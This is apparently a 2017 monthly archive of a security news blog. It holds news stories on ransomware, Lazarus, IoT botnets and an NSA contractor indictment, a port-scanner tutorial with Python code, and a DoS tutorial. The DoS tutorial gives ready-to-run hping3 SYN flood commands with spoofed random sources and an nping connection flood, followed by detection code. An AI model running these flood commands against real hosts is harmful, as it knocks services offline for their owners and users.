Monthly Archives: February 2017

Android ransomware attacks have grown by 50 percent

Ransomware targeting Android users has increased by over 50 percent in just a year, as cybercriminals increasingly take aim at what they view as an easy ecosystem to penetrate.

This, the highest number of attempts to infect Android smartphones and tablets with malicious file-encrypting software so far, comes as users increasingly turn to mobiles as their primary devices, storing more and more valuable data on them.

According to cybersecurity researchers at ESET, the biggest spike in ransomware attacks came in the first half of 2016. Because ransomware was then a relatively new attack vector, at least when it came to targeting businesses, many fell foul of it.

Ransomware detection from 2014 to 2016.

Image: ESET

Eastern Europe was initially the main target of ransomware distributors, but this has changed: figures in ESET’s Trends in Android Ransomware paper suggest that 72 percent of successful Lockerpin infections now hit users in the United States.

The reason for the shift in targeting, as with most other cybercriminal decision making, comes down to money. Mobile users in the US are richer than those in Eastern Europe, so distributors of ransomware can make more money by targeting them.

Lockerpin is a particularly aggressive form of Android ransomware, which has continually evolved since it was first discovered in August 2015. Typically spread via malicious, fake applications, Lockerpin claims to be the FBI, accusing the victim of harbouring illegal content and demanding a $500 ransom.

While some forms of Android ransomware have been a thorn in the side of users for well over a year, malicious developers aren’t content to rest on their laurels, and new variants appear all the time.

One of the newest forms of Android ransomware is Charger, a nasty form of mobile ransomware which steals data from its victims.

The previously unseen ransomware was found embedded in an app that claimed to improve the battery life of phones and tablets, and it was downloaded directly from Google Play. Google has since removed the app from its store.

In order to avoid falling victim to Android ransomware threats, ESET researchers recommend that users avoid unofficial app stores and keep mobile security software up-to-date.

It’s also recommended that users keep regular backups of data, so in the worst case scenario of falling victim to a ransomware attack, data can easily be retrieved without handing money to criminals.

Deleting your Yahoo email account? Yeah, good luck with that

Deleted your Yahoo account? Think again.

Several Yahoo users, who last year decided to leave the service, told us that their accounts remained open for weeks or months after the company said they would be closed.

News broke in September of a massive state-sponsored cyberattack that led to the theft of 500 million records — then thought to be the largest theft of records in history. That alone was enough for some to take action and delete their accounts, months before the company admitted it was hacked again — this time taking one billion accounts.

David Clarke was one of those departing users, whose dormant account was slowly accumulating junk over the past few years.

“This was an ancient email I had set up, had no personal data in it anymore and had a unique password,” Clarke wrote on Medium, describing his troubles. “But it’s a part of my digital footprint that I no longer required and decided, given the horrible security practices going on at Yahoo, to vote with my account and have it removed.”

Yahoo makes the account deletion process straightforward enough, but users have to wait “in most cases… approximately 90 days” for the account to close. The company says this is to “discourage users from engaging in fraudulent activity.”

On day 91, Clarke logged back into his account to find that it was still active. Unbeknownst to him, logging back in simply to check would reset the clock back to zero.

“Yahoo confirmed via email yesterday if you access your account it resets the timer,” he told me. “So, if you login to ensure your account has been deleted and it hasn’t, you have to wait at least another 90 days.”

Clarke may have checked down to the day, but others we spoke to said that their accounts were still active for months longer — even though they hadn’t logged back in.

One user told me that they deleted their account “the day the breach was announced” in late September. But, as of the end of January, he was still receiving messages that were automatically forwarded from his Yahoo inbox.

He told me that he hadn’t logged in to his account, yet he continues “to receive Yahoo-originated mailing list mail.” “This implies that the Yahoo account has not been deleted,” he added.

When we asked him to confirm his account was still active, he told me that his email address was accepted at the login screen.

Users with expired or deleted accounts would see an error message saying that their accounts are “not recognized.”

Another user told me that his account was “supposedly terminated” days after news of the hack broke, but confirmed that it was still active when it should have closed by December.

“Since around August, I had a handful of attempted logins from South Korea and India — maybe five or 10 of them,” he said. “Yahoo appeared to shut out most of them,” he added. “This account had essentially nothing in it — I think a decade-old Flickr account is the only reason I had it — so I wasn’t using two-factor authentication or paying much attention to it at all.”

“According to [Yahoo], my account should have been deleted by the end of December — but I received yet another ‘unexpected sign-in attempt’ email (from South Korea, as usual) on Feb. 1,” he said.

A delay in closing the account coupled with an unauthorized sign-in may be why the account has not closed.

“Why aren’t they at least putting the account into some kind of suspension mode?” the user told me.

A third user told me that he had also deleted his account around the time of the September breach but had not logged in since. He confirmed that his account was still active.

However, two other people confirmed that their accounts, marked for deactivation and deletion earlier in the year, had been successfully deleted and that they were unable to log in.

It’s not known how widespread the problem is or how many are affected.

The company has faced its fair share of bad security headlines: not only was it hacked on three occasions (if you count Tumblr), but it has also faced privacy issues and run-ins over national security, which led to an internal clash that resulted in the company’s chief security officer resigning.

A Yahoo spokesperson did not comment, but did point to the company’s privacy policy, which says: “Any information that we have copied may remain in back-up storage for some period of time after your deletion request. This may be the case even though no account information remains in our active user databases.”

Angry IP Scanner – How to Use and Download

What is Angry IP Scanner?

Angry IP Scanner is a simple, fast and effective portable program for scanning IP ranges and collecting details about the hosts it finds. It is free, and you can download it from the SourceForge website.

Supported Operating Systems

  • Windows XP
  • Windows Vista
  • Windows 7
  • Windows 8
  • Windows 10
  • Mac OS X
  • Linux (including Ubuntu)

It will work with earlier versions of Windows, but support is very limited.

Is this a virus?

No, it is not a virus. It is a simple network program designed for system administrators and network professionals. Some antivirus products flag it because port scanners are often bundled with malicious toolkits; that is a false positive. Before you whitelist it, make sure you downloaded it from the project's official download page and, where the project publishes one, that the file's checksum matches; then add it to your antivirus allow list.

Features:

Some of the notable features of Angry IP Scanner are:
  1. Small and efficient
  2. Fast port scanner
  3. Reverse DNS lookup of IP addresses
  4. MAC address lookup
  5. Complete IPv4 range support, from 1.0.0.1 to 255.255.255.255
  6. Automatic OS detection
  7. No adware, malware or advertising pop-ups
  8. Additional network configuration tools

How to Use Angry IP Scanner Tutorial

If you are a home user with a single computer, there is not much to do with this tool beyond scanning your own network range and seeing which hosts are up and which ports they expose. Make sure you do not break your country's laws: scanning addresses you do not own or administer is illegal in some countries, so stay inside your own range unless you have written permission from the owner.
Network admins will love this tool for what it can achieve in a few seconds (depending on the size of the IP block you are exploring). These are some of the important things it can help you with in your network management:

Scan for open ports

  1. Specify the IP range of your network
  2. Enter the hostname
  3. Select the netmask from the drop-down
  4. Press the Start button
  5. Wait until the scan completes
Hosts shown in red are dead (no response) and those shown in blue are alive. By default you are shown the ping time, hostname and open ports for each IP address.

Look up MAC address

  1. Follow the same steps as above
  2. Right-click any IP whose MAC address you want to know
  3. Select Show details
  4. You will now be shown the MAC address and other details

MAC lookup relies on the ARP cache, so it only works for hosts on your own local network segment; hosts behind a router show no MAC address.

Search for all open ports

  1. Select the IP address you want to check for open ports
  2. Right-click it and select Scan all ports
  3. You get the complete list in a few seconds

Scanning all 65,535 ports is noisy and will show up in the target's logs and any intrusion detection system watching it. There are many other tasks you can do with this open source program.
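What the scanner is actually doing in the steps above, as an added example written for this page (not Angry IP Scanner's own code, which is Java): expand the IP range or netmask you typed in, probe each host's ports with a TCP connect() the way a fast port scanner does, and read MAC addresses out of the ARP cache that the pings populated. The ARP table is a constructed sample in Linux /proc/net/arp format, and the loopback demo opens its own listener so the script runs offline.

```python
"""Three pieces of an IP/port scanner: range expansion, TCP connect() port
probing, and MAC lookup from the ARP cache.  Added illustration, not Angry IP
Scanner's own code; SAMPLE_ARP_TABLE is a constructed /proc/net/arp excerpt."""
import ipaddress
import socket
from typing import Dict, Iterator, List, Tuple


def expand_range(start: str, end: str) -> Iterator[str]:
    """Yield every IPv4 address from start to end inclusive (the 'IP range' field)."""
    first = int(ipaddress.IPv4Address(start))
    last = int(ipaddress.IPv4Address(end))
    if last < first:
        raise ValueError("range end precedes range start")
    for n in range(first, last + 1):
        yield str(ipaddress.IPv4Address(n))


def netmask_to_range(ip: str, prefix_len: int) -> Tuple[str, str]:
    """What the 'Netmask' drop-down does: one address plus a mask gives the
    first and last address of that network."""
    net = ipaddress.IPv4Network(f"{ip}/{prefix_len}", strict=False)
    return str(net.network_address), str(net.broadcast_address)


def scan_ports(host: str, ports: List[int], timeout: float = 0.5) -> List[int]:
    """TCP connect() scan: a completed handshake means the port is open;
    a refused or timed-out connection counts as closed/filtered."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports


# Constructed sample ARP cache.  Flags 0x2 = complete entry (the host answered
# ARP after our ping); 0x0 = incomplete (no reply, MAC unknown).
SAMPLE_ARP_TABLE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         aa:bb:cc:dd:ee:01     *        eth0
192.168.1.23     0x1         0x2         aa:bb:cc:dd:ee:17     *        eth0
192.168.1.99     0x1         0x0         00:00:00:00:00:00     *        eth0
"""


def parse_arp_table(text: str) -> Dict[str, str]:
    """Map IP -> MAC for complete ARP entries only.  ARP does not cross
    routers, which is why MAC lookup only works on your own LAN segment."""
    table: Dict[str, str] = {}
    for line in text.splitlines()[1:]:      # skip the header row
        fields = line.split()
        if len(fields) < 4:
            continue
        ip, _hw_type, flags, mac = fields[:4]
        if int(flags, 16) & 0x2:
            table[ip] = mac
    return table


def local_demo() -> dict:
    """Offline self-check: listen on a random loopback port, bind a second
    port without listening (so connects to it are refused), scan both."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    open_port = listener.getsockname()[1]
    closed = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    closed.bind(("127.0.0.1", 0))
    closed_port = closed.getsockname()[1]
    try:
        found = scan_ports("127.0.0.1", [open_port, closed_port])
    finally:
        listener.close()
        closed.close()
    return {"open_port": open_port, "closed_port": closed_port, "found": found}


if __name__ == "__main__":
    first, last = netmask_to_range("192.168.1.37", 24)
    print("range:", first, "-", last, len(list(expand_range(first, last))), "addresses")
    print("ARP:", parse_arp_table(SAMPLE_ARP_TABLE))
    print("loopback demo:", local_demo())
```

Run it as root or not, it makes no difference: connect() scans need no raw sockets, which is also why they are slower and noisier than SYN scans.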

Download Angry IP Scanner

Use the following links to download the program to your computer –
If you face any problem using this program, ask for help in the comment section. Use this program responsibly.

New wave of cyberattacks against global banks linked to Lazarus cybercrime group

An aggressive campaign of malware attacks against dozens of banks across the globe has been linked to the notorious cybercriminal group known as Lazarus.

The hacking gang, active since 2009, has been involved in a number of aggressive cyberattacks against financial institutions, including the theft of $81m from Bangladesh Bank’s account at the US Federal Reserve.
Now the group continues to be a thorn in the side of organisations across the globe as banks in 31 countries have been targeted in a new wave of attacks by Lazarus that began in October last year.

This latest wave of attacks came to light when a Polish bank discovered previously unknown malware on its network and shared indicators of compromise with other institutions, a number of which also found they’d fallen victim to the malware.

The source of the attack is suspected to have been the website of the Polish financial regulator, which had been compromised in a watering hole attack: visitors were redirected to an exploit kit that delivered the malware only to visitors coming from a list of around 150 IP addresses belonging to the intended targets.

While these are mostly banks, a small number of telecommunications and internet firms have also been targeted by this malware scheme, which takes aim at 104 organisations in 31 countries. Banks in Poland and the United States are most targeted by Lazarus in this attack, which also hit a number of banks in Central and South America.

Big Issue – How your fingerprint could actually make your iPhone less secure

Fingerprints and thumbprints might be convenient, but they can be used against you.

When Apple introduced its fingerprint reader to the iPhone, the company thought it would help keep your data more secure.

But the problem is that federal authorities have figured out that if they legally want access to your iPhone’s data, they can’t force you to turn over your passcode, though they can force you to unlock it with your fingerprint.

It’s a rare instance of the law moving faster than the tech in your pocket. US authorities figured out that your fingerprint is not subject to the Fifth Amendment, which protects the right to silence and prevents self-incrimination.

In other words, it protects what’s stored in your head, but not what’s on your fingertips.

It’s still up for discussion in the courts, but if you have vital secrets on your iPhone or work in an industry or space where you risk interactions with the law, such as peaceful protests, activism, or journalism, you may want to turn off Touch ID on your lock screen.
Disabling your fingerprint on the lock screen takes less than a minute. Here’s how.

1. Go to the Settings on your iPhone.

2. Go to Touch ID & Passcode.

3. Enter your lock screen passcode.

4. At the top of the screen, make sure iPhone Unlock is set to off.

5. You can also tighten the passcode requirement by scrolling down and changing Require Passcode to Immediately.

There’s no harm in using your fingerprint for Apple Pay or the iTunes and App Stores, but making the lock screen passcode-only further protects your data. If you need to lock the phone down in a hurry without changing any settings, power it off: after a restart iOS demands the passcode and will not accept a fingerprint.

Amazing: How IoT hackers turned a university’s network against itself

A university found its own network turned against it – as refrigerators and lights overwhelmed it with searches for seafood.

Hackers are increasingly building botnets out of unsecured Internet of Things devices and using them to direct traffic at particular targets in order to overwhelm servers with the aim of taking websites and services offline.

The hijacked devices are used to target networks which could be anywhere across the globe, but cybersecurity researchers have now detailed how a network of hacked IoT devices were turned around to attack the very network they were hosted on.

The case in question, as reported in Verizon’s Data Breach Digest 2017, occurred within the last year and involved the computer network at an unspecified university.

Analysis of the university firewall identified over 5,000 devices making hundreds of Domain Name System (DNS) look-ups every 15 minutes, slowing the institution’s entire network and restricting access to the majority of internet services.

In this instance, all of the DNS requests were attempting to look up seafood restaurants — and it wasn’t because thousands of students all had an overwhelming urge to eat fish — but because devices on the network had been instructed to repeatedly carry out this request.
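Detection logic for the pattern described above, as an added example (not Verizon's analysis or tooling): it groups DNS queries per client into 15-minute windows, flags clients above a threshold, collects the names they asked for so a themed set like seafood restaurants is visible, and counts flagged clients per /24 so a single segment, such as an IoT VLAN, stands out. The query log lines are constructed in a BIND-style format and the thresholds are deliberately small for the sample.

```python
"""Flag hosts that hammer the resolver, the way the university firewall logs
exposed thousands of devices each making hundreds of DNS look-ups every 15
minutes.  Added illustration, not Verizon's analysis; SAMPLE_LOG and the
thresholds are constructed (a real threshold would be in the hundreds)."""
import ipaddress
from collections import Counter, defaultdict
from datetime import datetime
from typing import Dict, List, Tuple

WINDOW_SECONDS = 15 * 60
EPOCH = datetime(1970, 1, 1)

# Constructed BIND-style query log: date time client <ip> query: <name> IN A
SAMPLE_LOG = """\
2017-02-10 13:00:01 client 10.20.5.11 query: captain-crab-seafood.example. IN A
2017-02-10 13:00:02 client 10.20.5.11 query: oyster-bar.example. IN A
2017-02-10 13:00:03 client 10.20.5.12 query: lobster-shack.example. IN A
2017-02-10 13:01:10 client 10.20.5.11 query: captain-crab-seafood.example. IN A
2017-02-10 13:02:00 client 10.1.1.40 query: www.university.example. IN A
2017-02-10 13:05:40 client 10.20.5.11 query: shrimp-hut.example. IN A
2017-02-10 13:09:15 client 10.20.5.12 query: lobster-shack.example. IN A
2017-02-10 13:14:59 client 10.20.5.11 query: oyster-bar.example. IN A
2017-02-10 13:20:00 client 10.20.5.11 query: shrimp-hut.example. IN A
"""


def parse_line(line: str) -> Tuple[datetime, str, str]:
    """Return (timestamp, client IP, queried name without the trailing dot)."""
    parts = line.split()
    ts = datetime.strptime(parts[0] + " " + parts[1], "%Y-%m-%d %H:%M:%S")
    return ts, parts[3], parts[5].rstrip(".")


def window_of(ts: datetime) -> int:
    """Index of the 15-minute window the timestamp falls in."""
    return int((ts - EPOCH).total_seconds()) // WINDOW_SECONDS


def queries_per_window(log: str) -> Dict[Tuple[str, int], List[str]]:
    """Group queried names by (client, window)."""
    groups: Dict[Tuple[str, int], List[str]] = defaultdict(list)
    for line in log.splitlines():
        if line.strip():
            ts, client, name = parse_line(line)
            groups[(client, window_of(ts))].append(name)
    return groups


def flag_noisy_clients(log: str, threshold: int) -> Dict[str, dict]:
    """Clients that made >= threshold queries in any single window, with
    their peak per-window count and the distinct names they asked for."""
    flagged: Dict[str, dict] = {}
    for (client, _win), names in queries_per_window(log).items():
        if len(names) >= threshold:
            entry = flagged.setdefault(client, {"peak": 0, "names": set()})
            entry["peak"] = max(entry["peak"], len(names))
            entry["names"].update(names)
    return flagged


def flagged_by_subnet(flagged: Dict[str, dict], prefix_len: int = 24) -> Dict[str, int]:
    """Count flagged clients per subnet: one segment lighting up is the
    'nearly all in the IoT infrastructure' signal from the write-up."""
    counts: Counter = Counter()
    for client in flagged:
        net = ipaddress.ip_network(f"{client}/{prefix_len}", strict=False)
        counts[str(net)] += 1
    return dict(counts)


if __name__ == "__main__":
    for client, info in flag_noisy_clients(SAMPLE_LOG, threshold=4).items():
        print(client, "peak", info["peak"], "queries/window:", sorted(info["names"]))
    print(flagged_by_subnet(flag_noisy_clients(SAMPLE_LOG, threshold=2)))
```

Pointed at real resolver logs, the interesting output is not any single client but the subnet tally: a normal campus shows flagged hosts scattered across user VLANs, while a hijacked IoT population shows one range with thousands of entries.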

“We identified that this was coming from their IoT network, their vending machines and their light sensors were actually looking for seafood domains; 5,000 discrete systems and they were nearly all in the IoT infrastructure,” says Laurance Dine, managing principal of investigative response at Verizon.

There’s no indication as to why hackers chose seafood restaurant searches as the tool of choice to overwhelm the servers.

Exploiting the poor security of Internet of Things devices, the attackers used brute-force attacks to crack default and weak passwords, gained access to the devices and deployed malware on them.

This malware instructed the likes of lights and fridges to turn their requests against the university in order to overwhelm the network in one of the first recorded attacks of its kind.

“It’s a very interesting concept of what the future may hold. Because the difference between what this is doing and other scenarios is [it’s] using your own IoT against you,” says Dine.

“They’re not using IoT or a combination of IoT networks from around the globe to target somebody in a botnet DDoS attack. This is actually the university’s own IoT network pitted against the university”.

This attack ultimately aimed to take down the network of the entire university, which would’ve succeeded if cybersecurity professionals hadn’t been able to remedy the attack.

While this incident represents one of the first of its kind, the bad news is this form of attack is only going to become more common as more and more everyday items get connected to the internet, providing hackers with greater numbers of potential zombie devices.

“The reason behind it is the issue of default credentials for wireless devices. This is going to bring billions of devices into the fold by 2020, which is only three years away. Whenever it is, there’s going to be so many of these things used by people with very limited understanding of what they are,” says Dine.

“There’s people who don’t have laptops that are going to have refrigerators that are going to be on a network that can communicate with whatever. They’re not going to know about changing default passwords,” he adds.

One way organisations can reduce their exposure to this sort of attack is to put IoT devices on a separate, firewalled network segment from the rest of the IT estate, so that a compromised fridge cannot reach, or flood, the systems the organisation depends on.

But until IoT manufacturers bother to properly secure their devices — and the organisations which deploy them learn to properly manage them — DDoS attacks by IoT botnets are going to remain a huge threat.

Why was the White House cybersecurity staff shaken up?

The Obama-appointed chief information security officer was charged with keeping the president and his staff safe from cyber-threats posed by hackers and nation-state attackers.
The chief information security officer for the White House’s Executive Office of the President has been removed from his position, sources have confirmed.

Cory Louie was appointed to the position by former President Obama in 2015, charged with keeping safe the staff closest to the president — including the president himself — from cyber-threats posed by hackers and nation-state attackers.

But circumstances surrounding his departure, weeks after President Donald Trump took office, remain unclear.

It’s thought he was either fired or asked to resign last Thursday evening, and he was escorted out from his office in the Eisenhower Executive Office Building across the street from the West Wing.

His LinkedIn profile remains unchanged at the time of writing.

Since then, there has been a near-absolute wall of silence from the White House — from both the staff, which up until last week worked for Louie, and spokespeople for the Trump administration.

However, one source said it’s because the remaining staff have “targets on their back” and are afraid of speaking out, calling the actions a “witch hunt” for former Obama appointees. Accusations of poor management were said to be reasons or excuses for his forced departure amid what was described as a “toxic” working environment.

Several messages to Louie throughout the week went unreturned.

A spokesperson for the White House did not return multiple requests for comment by phone and email.
News of the departure was first reported by Steve Clemons, an editor for The Atlantic, but could not be immediately confirmed. It was initially thought that senior Secret Service staff were dismissed, but this was quickly refuted by a spokesperson.

After holding various security positions at Dropbox and Google, Louie joined the White House as part of former President Obama’s cybersecurity national action plan, which created a federal chief information security officer (CISO) position to oversee the government’s internal cybersecurity strategy.

The White House CISO is charged with the security of all White House internal networks, communications, devices, and data.

While specifics of the role aren’t known, a memo written by Louie and circulated among White House staff gave insight into the work he did. The memo, later leaked, gave technology guidance and security advice on use of devices and communications during Obama’s visit to Cuba in March last year.

Louie remained on after the transition of power to the Trump administration, while a number of other key senior staff vacated their positions.

Meanwhile, Trump was given a new smartphone, a locked-down device similar to the one his predecessor had, but he reportedly also uses his old, outdated Samsung Galaxy phone to tweet, stirring frustration and mockery alike from security experts.

Former senior IT and cybersecurity staff, including former Federal CISO Gregory Touhill, former Federal Chief Information Officer Tony Scott, and former White House IT Director David Recordon, all resigned their positions when Obama left office.

It’s not known if Louie’s vacated position was immediately filled.

Awesome Hacking Month – What’s Upcoming This Month In Prohacker

We would like to let users know about the tutorials coming this month in the Prohacker application.

Right now we are preparing new tutorials with practical approaches. They are listed below:

  1. Automatic SQL injection and database tools
  2. Database honeypots
  3. Malware collectors
  4. Metasploit
  5. Nmap on Kali Linux
  6. More than 5 new tools and techniques for hacking
  7. And more, including daily hacking news and security vulnerabilities

Stay updated with Prohacker for this month's upcoming tutorials.

Rate us 5 stars and review us on Google Play if you like these tutorials and our work. We love to be appreciated.
Practical Approach For – DoS attacks using hping3 / nping

Wikipedia's explanation of DoS attacks: Denial-of-service attack

DDoS attacks are common, occurring about 28 times per hour. Digital Attack Map (http://www.digitalattackmap.com) shows the worldwide distribution of DDoS attacks in near real time:

On the map the international situation can be seen; for example, attacks between Japan and China could be seen on September 18, and after Trump announced the wall, attacks between Mexico and the United States.

DoS attacks using hping3 (hping3 crafts raw packets, so it must run as root):

#hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source testsite.com

  • -c: the number of packets to send
  • -d: the size of the data payload of each packet, in bytes (120 bytes of data on a bare SYN is unusual in itself and a handy signature for defenders)
  • -S: send SYN packets
  • -w: the TCP window size to advertise
  • -p: the target port; you can specify any port
  • --flood: send packets as fast as possible, without waiting for or displaying replies
  • --rand-source: use a different random source IP address on every packet, so the target sees a pile of addresses and cannot locate the real one; you can also use -a / --spoof to send every packet from one fixed, spoofed address

Because the source addresses are spoofed, the target's SYN-ACK replies go to random third parties, so run this only against hosts you own or are explicitly authorised to test, on an isolated lab network.

Simple SYN flood attack:

# hping3 -S --flood -V testsite.com

TCP connection attack with nping (completes full connect() handshakes at 90,000 per second, 900,000 in total, quietly):

# nping --tcp-connect --rate=90000 -c 900000 -q testsite.com

For more information on these two tools:

# man hping3
# man nping
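The receiving end of the floods above, as an added example that is not part of the original tutorial: the script parses constructed tcpdump -n output, counts bare SYNs per second and per source, and distinguishes a --rand-source flood (every SYN from a different address) from a single spoofed or real source such as -a / --spoof produces. The capture lines and the threshold are constructed.

```python
"""Receiver-side detection for the SYN floods shown above: parse tcpdump -n
output, count bare SYNs per second and per source, and guess how the flood was
generated.  Added illustration, not part of the tutorial; SAMPLE_CAPTURE and
the threshold are constructed."""
import re
from collections import Counter, defaultdict
from typing import Dict, List

# Constructed tcpdump -n lines.  Flags [S] = bare SYN, [S.] = SYN-ACK, [.] = ACK.
# 12:00:00 carries a --rand-source flood (-d 120 shows up as "length 120"),
# 12:00:01 a normal three-way handshake, 12:00:02 a flood from one address.
SAMPLE_CAPTURE = """\
12:00:00.000101 IP 203.0.113.7.40001 > 192.0.2.10.80: Flags [S], seq 0, win 64, length 120
12:00:00.000205 IP 198.51.100.42.40002 > 192.0.2.10.80: Flags [S], seq 0, win 64, length 120
12:00:00.000311 IP 192.0.2.77.40003 > 192.0.2.10.80: Flags [S], seq 0, win 64, length 120
12:00:00.000418 IP 203.0.113.200.40004 > 192.0.2.10.80: Flags [S], seq 0, win 64, length 120
12:00:00.000522 IP 198.51.100.3.40005 > 192.0.2.10.80: Flags [S], seq 0, win 64, length 120
12:00:00.000630 IP 203.0.113.91.40006 > 192.0.2.10.80: Flags [S], seq 0, win 64, length 120
12:00:01.100000 IP 10.0.0.5.51000 > 192.0.2.10.80: Flags [S], seq 0, win 29200, length 0
12:00:01.100150 IP 192.0.2.10.80 > 10.0.0.5.51000: Flags [S.], seq 0, ack 1, win 28960, length 0
12:00:01.100300 IP 10.0.0.5.51000 > 192.0.2.10.80: Flags [.], ack 1, win 229, length 0
12:00:02.000010 IP 198.51.100.9.40010 > 192.0.2.10.80: Flags [S], seq 0, win 64, length 120
12:00:02.000020 IP 198.51.100.9.40011 > 192.0.2.10.80: Flags [S], seq 0, win 64, length 120
12:00:02.000030 IP 198.51.100.9.40012 > 192.0.2.10.80: Flags [S], seq 0, win 64, length 120
12:00:02.000040 IP 198.51.100.9.40013 > 192.0.2.10.80: Flags [S], seq 0, win 64, length 120
12:00:02.000050 IP 198.51.100.9.40014 > 192.0.2.10.80: Flags [S], seq 0, win 64, length 120
"""

LINE_RE = re.compile(
    r"^(?P<time>\d\d:\d\d:\d\d)\.\d+ IP (?P<src>[\d.]+)\.(?P<sport>\d+) > "
    r"(?P<dst>[\d.]+)\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]*)\]"
)


def parse_capture(text: str) -> List[Dict[str, str]]:
    """One dict per recognised line; lines that do not match are skipped."""
    return [m.groupdict() for m in map(LINE_RE.match, text.splitlines()) if m]


def syn_sources_per_second(records: List[Dict[str, str]]) -> Dict[str, Counter]:
    """second -> Counter(source address -> bare SYN count).  SYN-ACKs and
    ACKs belong to real handshakes and are ignored."""
    per_second: Dict[str, Counter] = defaultdict(Counter)
    for r in records:
        if r["flags"] == "S":
            per_second[r["time"]][r["src"]] += 1
    return per_second


def detect_syn_flood(text: str, syn_threshold: int) -> Dict[str, dict]:
    """Seconds with at least syn_threshold bare SYNs, with the SYN count, the
    number of distinct sources, and a guess at how the flood was generated."""
    findings: Dict[str, dict] = {}
    for second, sources in syn_sources_per_second(parse_capture(text)).items():
        total = sum(sources.values())
        if total < syn_threshold:
            continue
        if len(sources) == total:
            pattern = "randomised sources (--rand-source)"
        elif len(sources) == 1:
            pattern = "single source (-a/--spoof or unspoofed)"
        else:
            pattern = "mixed sources"
        findings[second] = {
            "syns": total,
            "distinct_sources": len(sources),
            "pattern": pattern,
        }
    return findings


if __name__ == "__main__":
    for second, info in sorted(detect_syn_flood(SAMPLE_CAPTURE, 5).items()):
        print(second, info)
```

A real capture would be fed in from tcpdump -n -l piped through stdin, with a threshold set from the host's normal SYN rate; the distinct-source count is what tells you whether blocking a single address will help or whether you need SYN cookies and upstream filtering.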

Please feel free to share your views, experience or issues in the comments below. Spam comments are strictly prohibited. We now have better comment systems and servers.

If you like this application, please give your valuable review on the Google Play Store.

Enjoy hacking!

Former NSA contractor indicted over 50TB gov’t classified data theft

  • A former US National Security Agency (NSA) contractor has been indicted over an alleged 20-year campaign to steal classified government documents.
  • On Wednesday, a federal grand jury indicted Harold Thomas Martin III for what prosecutors say “may have been the largest heist of classified government information in history,” as reported by Reuters.
  • Reports suggest that the alleged theft may have also included the majority of the NSA’s elite hacking unit’s extensive library of hacking tools and software.
  • The 52-year-old allegedly collected data from the US intelligence agency relating to national defense from December 1993 to August 2016.
  • According to Acting Assistant Attorney General for National Security Mary McCord, US Attorney Rod Rosenstein for the District of Maryland and Special Agent Gordon Johnson of the FBI’s Baltimore Field Office, Martin was employed by at least seven different private companies during this time and was granted work as a contractor for various government agencies.
  • The contractor held security clearances up to Top Secret and Sensitive Compartmented Information (SCI) during some of this time period, and according to prosecutors, “worked on a number of highly classified, specialized projects where he had access to government computer systems, programs and information, including classified information.”
  • Over the course of over two decades, Martin allegedly stole sensitive information which was then hoarded at his home in Glen Burnie, Maryland.
  • The Washington Post reported earlier this week that the stolen data included NSA hacking tools, operational plans against a “known enemy” of the US, and a total of 50 terabytes of digital, classified material.
  • According to the publication, Martin once held a position in the NSA’s top hacker unit, Tailored Access Operations (TAO), and managed to make off with over 75 percent of the department’s library of hacking tools.
  • If the allegation proves to be true, TAO’s library and hacking toolset not only would fetch a very high price on the market due to the unit’s focus on cyberespionage, but the theft highlights a gross security breach in what should be a secretive and secure department.
  • It is not currently known whether any of the alleged stolen data was utilized for nefarious purposes, sold, or leaked. 
  • When Martin was taken into custody last August, he was working for Booz Allen Hamilton, a government contractor which also provided former NSA contractor Edward Snowden to the intelligence agency.
  • In 2013, Snowden leaked a treasure trove of confidential government documents to the media which exposed the mass surveillance activities of the US agency both in its home country and abroad, prompting outrage from technology vendors and the general public.
  • Martin’s indictment means he faces a total of 20 criminal counts, each of which can earn the former contractor up to 10 years in prison under the Espionage Act, according to the Department of Justice (DoJ).
  • “The FBI investigation and this indictment reveal a broken trust from a security clearance holder,” said Johnson. “Willfully retaining highly classified national defense information in a vulnerable setting is a violation of the security policy and the law, which weakens our national security and cannot be tolerated.”
  • The former contractor is reportedly considered a flight risk — perhaps as an echo of Snowden’s dash to Russia — and remains at a detention facility until a hearing on February 14 at the US District Court in Baltimore.